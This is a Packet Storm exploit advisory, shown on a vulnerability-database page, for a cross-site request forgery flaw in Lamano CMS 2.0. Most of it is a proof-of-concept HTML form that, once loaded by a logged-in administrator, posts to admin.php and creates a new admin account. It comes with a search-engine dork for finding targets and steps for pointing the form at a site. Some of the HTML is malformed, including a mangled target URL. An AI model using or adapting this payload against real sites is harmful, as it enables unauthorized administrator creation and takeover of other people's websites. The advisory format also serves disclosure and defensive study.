Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormIndoushkaPACKETSTORM:174772
HistorySep 20, 2023 - 12:00 a.m.

Lamano CMS 2.0 Cross Site Request Forgery

2023-09-2000:00:00
indoushka
packetstormsecurity.com
220
lamano cms
csrf
admin.php
html form
mozilla firefox
JSON
`====================================================================================================================================  
| # Title : Lamano CMS v2.0 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |   
| # Vendor : http://www.lamano.lu/ |   
| # Dork : © 2018 Lamano by easysolutions |  
====================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] The following html code create a new admin .  
  
[+] Go to the line 8.  
  
[+] Set the target site link Save changes and apply .   
  
[+] infected file : admin.php  
  
[+] http://127.0.0.1/q73/admin.php .  
  
[+] save code as poc.html .  
  
<!DOCTYPE html>  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head profile="http://www.w3.org/2005/10/profile">  
  
</tr>  
</table>  
<br/><br/>  
<form action="https://www.sylviebecker.127.0.0.1/lu/admin.php?action=add_user" method="POST">  
<table class="modif_utilisateur" border="0" cellpadding="3" cellspacing="0" width="350">  
<tr>  
<td class="tah11" colspan="2" align="center"><B>Nouvel utilisateur : </B></td>  
</tr>  
<tr>  
<td class="tah11" align="right">Nom d'utilisateur :</td>  
<td class="tah11" align="left"><input type="text" name="user" class="form-control" value=""></td>  
</tr>  
<tr>  
<td class="tah11" align="right">Mot de passe : </td>  
<td class="tah11" align="left"><input type="text" name="pass" class="form-control" value=""></td>  
</tr>  
<tr>  
<td class="tah11" colspan="2" align="center"><input class="btn btn-lg btn-primary" type="submit" value="Ajouter"></td>  
</tr>  
</table>  
</form><br/><br/>  
<div>  
  
  
Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |  
=======================================================================================================================================  
`
JSON